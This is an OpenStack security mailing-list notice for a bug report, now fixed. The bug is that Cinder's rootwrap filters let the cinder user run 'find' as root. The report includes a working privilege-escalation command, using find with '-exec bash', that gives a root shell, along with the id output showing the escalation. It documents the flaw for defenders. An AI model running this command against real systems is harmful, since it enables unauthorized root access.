[Openstack-security] [Bug 1250101] Re: Cinder's rootwrap filters allow to run find as root, which allows arbitrary commands

Thierry Carrez thierry.carrez+lp at gmail.com
Thu Apr 17 09:32:43 UTC 2014 

** Changed in: cinder
    Milestone: icehouse-3 => 2014.1

-- 
You received this bug notification because you are a member of OpenStack
Security Group, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1250101

Title:
  Cinder's rootwrap filters allow to run find as root, which allows
  arbitrary commands

Status in Cinder:
  Fix Released
Status in Oslo - a Library of Common OpenStack Code:
  Invalid
Status in OpenStack Security Advisories:
  Invalid

Bug description:
  The patch
  https://github.com/openstack/cinder/commit/688c515b9d662486395d36c303ca599376a1dc0d
  added the find command to etc/cinder/rootwrap.d/volume.filters. This
  introduces a security hole as the find command is able to call exec,
  and so the cinder user can run any command as root. For example:

  vagrant at controller:~$ sudo -u cinder bash
  cinder at controller:~$ id
  uid=109(cinder) gid=115(cinder) groups=115(cinder)

  cinder at controller:~$ sudo /usr/bin/cinder-rootwrap
  /etc/cinder/rootwrap.conf find /etc/hosts -exec bash \;

  root at controller:~# id
  uid=0(root) gid=0(root) groups=0(root)

  
  I guess the way to fix this is to add a FindFilter to Oslo that rejects calls to find with the -exec or -execdir argument.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1250101/+subscriptions

More information about the Openstack-security mailing list